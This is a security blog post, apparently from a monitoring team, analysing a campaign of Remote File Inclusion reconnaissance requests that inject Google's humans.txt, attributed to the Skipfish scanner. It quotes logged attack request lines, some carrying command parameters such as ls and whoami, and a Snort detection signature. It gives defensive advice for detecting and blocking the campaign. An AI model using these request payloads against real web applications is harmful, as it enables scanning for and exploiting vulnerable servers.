Increasement of RFI attacks using Google

(Please note this post was originally published past 10th January in the Spanish version of SAW but we find it relevant —and couldn’t find time to translate until now— ;)

Lately, we are detecting a significant increase of Remote File Inclusion [1] attacks in which the same pattern is repeated in the payload of the attack. In these, the URL of injection used is always the same: http://www.google.es/humans.txt. Although the content of this file is not malicious, the amount and frequency of alerts that are detected show that there is a reconnaissance attacks campaign underway.

The attacking IP addresses are located worldwide (up to 10 countries have been detected, including Spain), which may indicate that one or more botnets are behind this attack. On average, over a period of 10 days, each one of these IP has attacked about 12 targets, generating between 2000 and 5000 alerts each one.

As an example, some of the requests detected are the following:

GET /zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://www.google.com/humans.txt? 
GET /123flashchat.php?e107path=http://www.google.com/humans.txt? HTTP/1.0
GET /22_ultimate/templates/header.php?mainpath=http://www.google.com/humans.txt?
GET /A-Blog/navigation/donation.php?navigation_start=http://www.google.com/humans.txt?
GET /OpenSiteAdmin/scripts/classes/FieldManager.php?path=http://www.google.com/humans.txt?%00
GET /index.php?dir=http://www.google.com/humans.txt?
GET /pollvote.php?pollname=http://www.google.com/humans.txt?&cmd=ls
GET /rss.php?page[path]=http://www.google.com/humans.txt?&cmd=ls
GET /phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.google.com/humans.txt?
GET /rss.php?page[path]=http://www.google.com/humans.txt?&cmd=ls
GET /arab3upload/customize.php?path=http://www.google.com/humans.txt?&cmd=pwd
GET /ListRecords.php?lib_dir=http://www.google.com/humans.txt?&cmd=id
GET/ea-gBook/index_inc.php?inc_ordner=http://www.google.com/humans.txt?&act=cmd&cmd=whoami&d=
    /&submit=1&cmd_txt=1

As we see, it appears that they are looking for vulnerable resources automatically. To check these vulnerabilities they try to inject the (not malicious) google file humans.txt. This file contains the following paragraph:

“Google is built by a large team of engineers, designers, researchers, robots, and others in many different sites across the globe. It is updated continuously, and built with more tools and technologies than we can shake a stick at. If you’d like to help us out, see google.com/jobs.”

If the attack is successful, the attacked site contains that text. It seems that the automatic tool used is Skipfish. Skipfish will test for an RFI injection point sending the string www.google.com/humans.txt or www.google.com/humans.txt%00 to the site’s webpages.

It is clear that cyber criminals are increasingly using automated tools to perform web attacks [2], and generating an important amount of malicious traffic. Therefore, it is necessary to know and study the new trends in automated attacks, in order to keep working to improve the rules of the sensors. Usually, automated tools perform reconnaissance attacks looking for vulnerable applications or resources that will be attacked more aggressively later. Detecting a reconnaissance attack early helps to identify attack vectors to other applications and allows the blacklisting of IP addresses before they start the real attack.

In the case of Snort IDS, the following signature of Emerging Threats alerts us of an attack of this type:

#alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB_SERVER PHP Generic 
Remote File Include Attempt (HTTP)"; flow:to_server,established; content:".php"; nocase; 
http_uri; content:"=http|3a|/"; nocase; http_uri; 
pcre:"/\x2Ephp\x3F.{0,300}\x3Dhttp\x3A\x2F[^\x3F\x26]+\x3F/Ui";
reference:url,doc.emergingthreats.net/2009151; classtype:web-application-attack; 
sid:2009151; rev:7;)

To known if we are victims of the attack, we must check if our server connects to Google looking for that file. Furthermore, since the attack is directed toward specific Web application modules, we recommend reviewing that all the modules are updated, and uninstall all those not strictly necessary.To block this type of attack in particular we recommended to add a rule in the IPS or WAF (if available) that blocks any request that includes the “www.google.com/humans.txt” string in the URI.

Another way is to try to block Skipfish via its User-Agent, which for the 2.10b version is “Mozilla/5.0 SF/2.10b” although this field can be easily changed and therefore it may give a false sensation of security.

According to the documentation of this tool, Skipfish is able to perform more than 500 requests/second against sensitive resources on the Internet and over 2000 requests per second on LAN/MAN networks. You might want to block traffic with these characteristics.

It appears that this campaign is being fairly widespread. The Akamai CSIRT recently warned of it, coinciding with our evidence, although they say that the objectives are financial sites. In our case the attack had not an specific targets.

[1] An RFI attack is an attack that allows an attacker to inject a remote file, usually through a script on a Web server. This attack can lead to theft or data manipulation, execution of malicious code on the Web server, or run malicious code on the side of the client application (such as JavaScript) which can lead to other attacks. This attack exploits a vulnerability caused by poor data validation of user input.

[2] According to a study from Imperva of July 2012, more than half of the malicious Web attacks detected in traffic for most common types of attacks (RFI, LFI, SQL Injection, Comment Spam, XSS and DirectoryTraversal) came from automatic tools.